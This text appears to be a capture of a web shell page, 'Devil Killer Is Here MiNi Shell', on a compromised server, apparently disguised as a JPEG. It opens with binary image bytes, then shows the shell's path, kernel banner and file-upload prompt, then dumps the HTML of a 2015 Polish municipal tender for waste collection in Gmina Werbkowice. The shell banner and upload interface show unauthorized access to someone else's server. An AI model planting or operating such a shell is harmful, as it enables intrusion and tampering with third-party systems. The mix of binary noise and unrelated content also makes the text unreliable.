JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151127/321866-N-2015.html

<p class="kh_header"><b>Werbkowice: USŁUGI ODBIORU I ZAGOSPODAROWANIA ODPADÓW  KOMUNALNYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY WERBKOWICE w roku 2016</b><br>
<b>Numer ogłoszenia: 321866 - 2015; data zamieszczenia: 27.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Werbkowice reprezentowana przez Wójta Gminy , ul. Zamojska 1, 22-550 Werbkowice, woj. lubelskie, tel. 084 6572003 w. 33, faks 084 6572080.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> gminawerbkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ODBIORU I ZAGOSPODAROWANIA ODPADÓW  KOMUNALNYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY WERBKOWICE w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia obejmuje załadunek, transport i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych Gminy Werbkowice z 4 sektorów wyznaczonych na terenie Gminy Werbkowice w następującym zakresie. 
1. Odbierania od właścicieli nieruchomości odpadów komunalnych niesegregowanych 20 03 01 i  pozostałości z sortowania  z częstotliwością:
a) w zabudowie wielorodzinnej - min. co dwa tygodnie, a w przypadku wcześniejszego zapełnienia pojemnika 1100 l lub kontenerów Kp -7 na każde zgłoszenie telefoniczne.
b) w zabudowie jednorodzinnej - raz na miesiąc - od właścicieli nieruchomości zamieszkałych z poj., 80 l, 120 l, 240 l, 1100 l W przypadku wystawienia przez właściciela nieruchomości odpadów zmieszanych w dodatkowym worku obok pojemnika, Wykonawca zobowiązany jest odebrać te odpady. 

2. Odbierania od właścicieli nieruchomości odpadów komunalnych zebranych w sposób selektywny następujących frakcji: papieru, szkła, tworzyw sztucznych, opakowań wielo materiałowych oraz odpadów ulegających biodegradacji: oznaczonych kodami : 15 01 01, 15 01 02, 15 01 04, 15 01 05, 15 01 07, 20 02 01.
Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej  odbywa się w systemie workowym o poj., 120 l oraz w systemie pojemników 1100 l, których lokalizację dla poszczególnych sektorów  przedstawiają załączniki do SIWZ. Worki do zbiórki  odpadów zapewni i dostarczy mieszkańcom Wykonawca  w dniu wykonania usługi w danym miesiącu , z tym, że worki na miesiąc styczeń 2016 Wykonawca dostarczy wraz z harmonogramem. Kolorystyka worków ma odpowiadać wymaganiom wskazanym w regulaminie utrzymania i czystości obowiązującym na terenie Gminy Werbkowice.
Odbiór odpadów selektywnie zebranych będzie się odbywał z częstotliwością:
a) w zabudowie jednorodzinnej min. 1 raz na miesiąc z worków, które dostarczy mieszkańcom przedsiębiorca, pojemność i kolorystyka worków ma odpowiadać wymaganiom  określonym w regulaminie o utrzymaniu czystości i porządku w gminie, określonym  Uchwałą Rady Gminy Nr XXVII/157/2012 z dnia 30 października 2012 r.
b) w zabudowie wielorodzinnej min. 1 raz na dwa tygodnie z poj. 1100l i Kp-7 przeznaczonych na odpady segregowane,  a w przypadku wcześniejszego zapełnienia na każde zgłoszenie telefoniczne.

3.   Odbierania odpadów komunalnych budowlanych o kodach: 170102, 170103, 170107,170180 -  wytworzonych w gospodarstwach domowych, pochodzących z drobnych remontów i napraw wykonywanych systemem gospodarczym , nie  wymagających  zgłoszenia lub pozwolenia  na budowę, zgromadzonych przez właścicieli nieruchomości w kontenerach na odpady budowlane i remontowe odpowiednio oznakowanych i podstawionych przez Wykonawcę, w wyznaczonych  miejscowościach  - minimum  jeden  kontener  na dany sektor. Częstotliwość opróżniania tych kontenerów, na każde zgłoszenie telefoniczne. - minimum  jeden kontener na dany sektor, który wybrany Wykonawca dostarczy do dnia 20 stycznia 2016 r. Miejsce ustawienia kontenera wskaże Zamawiający.
4. Zorganizowania zbiórki odpadów zużytego sprzętu elektrycznego i elektronicznego o kodach 20 01 35 i 20 01 36* w każdym sektorze w okresie trwania umowy w terminie do dnia  30 sierpnia 2016 r. Cenę za usługę należy wkalkulować w cenę oferty. Usługa nie będzie podlegała odrębnemu rozliczeniu.
5. Odbioru odpadów selektywnie zebranych z Punktów Selektywnej Zbiórki Odpadów Komunalnych w Sahryniu i Hostynnem o kodach 20 03 07 - odpady wielkogabarytowe  (zużyte meble ).- dotyczy tylko wykonawców świadczących usługi w Sektorze III i IV.
Ilość wytworzonych odpadów nie jest zależna od Zamawiającego. Ustalone ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb zamawiającego  uwzględniając ilość odpadów wytworzonych przez producentów. Podane powyżej ilości należy traktować jako orientacyjne i Wykonawcy nie przysługuje prawo   odszkodowania za nieosiągnięcie wskazanych  ilości.

5. Miejsce przekazania  zebranych  odpadów.  
Zebrane  odpady, o których  mowa  powyżej  Wykonawca zobowiązany jest  przekazać:
a) zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania - do właściwych instalacji regionalnych lub zastępczych zgodnie z Wojewódzkim Planem  Gospodarki Odpadami dla Województwa Lubelskiego.
b) odpady selektywne - zgodnie z hierarchią postępowania z odpadami, określoną w art. 17 i 20 ustawy o odpadach z dnia 14 grudnia 2012  roku Dz. U z 2013 r. Poz. 21. z późn.zm).
6. Standard sanitarny wykonywania przedmiotu zamówienia :
1) Odbieranie odpadów komunalnych wszystkich frakcji odbywać się będzie zgodnie z harmonogramem sporządzonym przez Wykonawcę i zatwierdzonym przez Zamawiającego, podanym do publicznej wiadomości mieszkańcom w poszczególnych sektorach i ogłoszonym na tablicy Urzędu Gminy. 
2) Worki na selektywne zbieranie odpadów (dotyczy sektora II,III,IV) dostarczy mieszkańcom Wykonawca. Na miesiąc styczeń worki zostaną dostarczone przed pierwszym odbiorem odpadów wraz z harmonogramem. W pozostałych miesiącach worki będą dostarczane na wymianę w każdym miesiącu obowiązywania umowy w dniu świadczenia usług.
3) Załadunek i transport odpadów będzie odbywał się za pomocą sprzętu sprawnego technicznie gwarantującego bezpieczny transport odpadów, uniemożliwiający pylenie.
4) Ilość środków transportu będąca w dyspozycji wykonawcy ma zapewniać pełną i nieprzerwaną obsługę określonej w sektorze planowanej liczby obsługiwanych mieszkańców z częstotliwością określoną w opisie przedmiotu zamówienia. 
5) Wykonawca ma obowiązek powstałe podczas odbioru odpadów komunalnych zanieczyszczenia systematycznie usuwać.
6) Wykonawca ma obowiązek dezynfekcji kontenerów Kp-7 po każdorazowym transporcie odpadów. 
7) Wykonawca będzie świadczył usługi wyłącznie sprzętem spełniającym wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013  roku w  sprawie szczegółowych wymagań w  zakresie  odbierania odpadów  komunalnych od właścicieli nieruchomości w  szczególności pojazdami wyposażonymi w system monitoringu bazującego na  systemie  pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscu  postoju a także czujników zapisujących  dane o miejscach wyładunku odpadów,  umożliwiający weryfikację tych danych. 
8) Wykonawca nie może prowadzić usługi odbioru odpadów pojazdem, który posiada uszkodzony system pozycjonowania satelitarnego (GPS). Jeżeli do awarii dojdzie w momencie prowadzenia zbiórki odpadów, fakt ten należy niezwłocznie zgłosić Zamawiającemu, a samochód z uszkodzonym systemem GPS zastąpić sprawnym pojazdem w celu kontynuowania zbiórki odpadów. 
9) Wykonawca po zakończeniu każdego miesiąca przekaże Zamawiającemu wraz z fakturą na  nośniku elektronicznym zapis GPS w celu weryfikacji danych o położeniu pojazdu, miejscach postoju oraz miejscach wyładunku odpadów. 
10) Wykonawca udostępni Zamawiającemu na czas  trwania umowy program umożliwiający odtworzenie informacji na przekazywanych nośnikach .
7. Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem: 
1) wykonawca zobowiązany jest do złożenia wraz ze sprawozdaniem o którym mowa w art. 9 n ustawy o utrzymaniu czystości porządku w gminach informacji o osiągniętych poziomach recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami papieru, metali, tworzyw sztucznych i szkła oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania. 
2) wykonawca zobowiązany jest do  przekazania Zamawiającemu   wraz z fakturą wszystkich kopii kart przekazania odpadów do instalacji odzysku, recyklingu lub unieszkodliwiania  odpadów potwierdzających sposób zagospodarowania zebranych odpadów. Karty powinny odpowiadać wymogom Ministra Środowiska z dnia 08 grudnia 2010 roku w sprawie wzorów  stosowanych na potrzeby ewidencji odpadów.  
3) Wykonawca zobowiązany będzie do comiesięcznego przekazywania wraz z fakturą:
-  dowodów ważenia odpadów zmieszanych z datą z dnia wykonania  usługi.
- dowodu ważenia odpadów selektywnie zebranych w danym miesiącu.
- wydruku z GPS lub płyty CD z trsa przejazdu pojazdów.
4) Wykonawca podczas realizacji zamówienia dokona wszelkich starań aby jak największa ilość zebranych odpadów poddać recyklingowi i przygotować do ponownego użycia lub odzysku innymi metodami. 
8. Wymogi stosowania przepisów szczegółowych do realizacji zamówienia:
Wykonawca zobowiązany jest do przestrzegania i stosowania w trakcie realizacji przedmiotu  zamówienia  przepisów prawa, w  szczególności takich jak:
a) Uchwała Nr  XXVII/157/2012 Rady Gminy  Werbkowice z dnia 30 października 2012 r. w  sprawie Regulaminu utrzymania czystości i porządku na terenie gminy Werbkowice;
b) uchwała Nr XXVIII/159/2012 r. Rady Gminy Werbkowice z dnia 22 listopada 2012 r. w sprawie określenia szczegółowego sposobu świadczenia usług w zakresie odbierania odpadów  komunalnych od właścicieli nieruchomości, zagospodarowania tych odpadów. 
c) uchwała Nr  XXXII/189/2013 Rady Gminy Werbkowice z dnia 26 marca 2013 roku zmieniająca uchwałę w sprawie szczegółowego sposobu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, zagospodarowania tych odpadów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielania zamówień uzupełniających, o których mowa w art 67 ust.1 pkt 6 ustawy pz.p</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości
a) na  zadanie  określone  jako SEKTOR I  - 2 000,00 PLN
b) na  zadanie określone  jako SEKTOR II  - 2 000,00 PLN 
c) na  zadanie określone  jako SEKTOR III- 2 000,00 PLN 
d) na  zadanie określone  jako SEKTOR IV- 2 000,00 PLN
W przypadku  składania  oferty  na  więcej niż  jeden  sektor  wadium należy  wyliczyć  jako  suma  poszczególnych  części .
2. Wadium należy wnieść przed upływem terminu składania ofert. 
3. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj.: Dz. U. 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz1505 oraz z 2010 r. Nr 96, poz 620). 4. Zamawiający, który nie wniesie wadium do upływu terminu składnia ofert zostanie wykluczony z postępowania o udzielenie zamówienia 
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku BS Werbkowice Nr 20 9642 0009 2001 0000 0619 0005 .
6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza 
7. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy 
8. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert 
9. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 6, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego 
10. Jeżeli wadium wniesiono w pieniądzu Zamawiający zwraca je na konto Wykonawcy. 
11. Zamawiający zatrzymuje wadium jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 ustawy PZP, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w tym zakresie powinien posiadać:
a) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości Gminy  Werbkowice, o którym mowa w art. 9 b i 9c ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku  w gminach( Dz. U z 2012 r poz. 391 ze  zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał  usługę przez okres 12 miesięcy, polegającą na odbiorze i zagospodarowaniu odpadów w ilości min. 200 ton, potwierdzoną  przez instalacje do zagospodarowania odpadów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania odpowiednim potencjałem technicznym wyposażeniem i  urządzeniami technicznymi zgodnie z rozporządzeniem Ministra  Środowiska z dnia 11 stycznia 2013 roku w sprawie szczególnych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami w szczególności:
(1) dwoma  pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych;
(2) dwoma  pojazdami do odbierania  selektywnie zbieranych odpadów komunalnych;
(3) jednym pojazdem do odbierania odpadów komunalnych bez  funkcji  kompaktującej;
(4) posiadania bazy magazynowo- transportowej usytuowanej na terenie gminy Werbkowice lub w odległości nie większej niż 60 km, zlokalizowanej na terenie do którego Wykonawca  posiada tytuł prawny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca złoży oświadczenie, iż osoby, które będą brały udział w realizacji zamówienia posiadają odpowiednie uprawnienia do wykonania usług.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia (od szkód osób i mienia ) o wartości nie mniejszej niż 100 tys. PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykaz części zamówienia, które zostaną powierzone podwykonawcom - wg załącznika Nr 7
2) pełnomocnictwo do reprezentowania Wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej, 
3) dowód wniesienia wadium 
4) opłacona polisę,
5) potwierdzenie posiadanych uprawnień wymaganych przepisami prawa - zał. 4
6) informacja dotycząca powstania u zamawiającego obowiązku podatkowego wynikającego z art. 91 ust. 3 a ustawy Pzp - zał. 16</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - czas reakcji na zgłoszenie usterki lub reklamacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
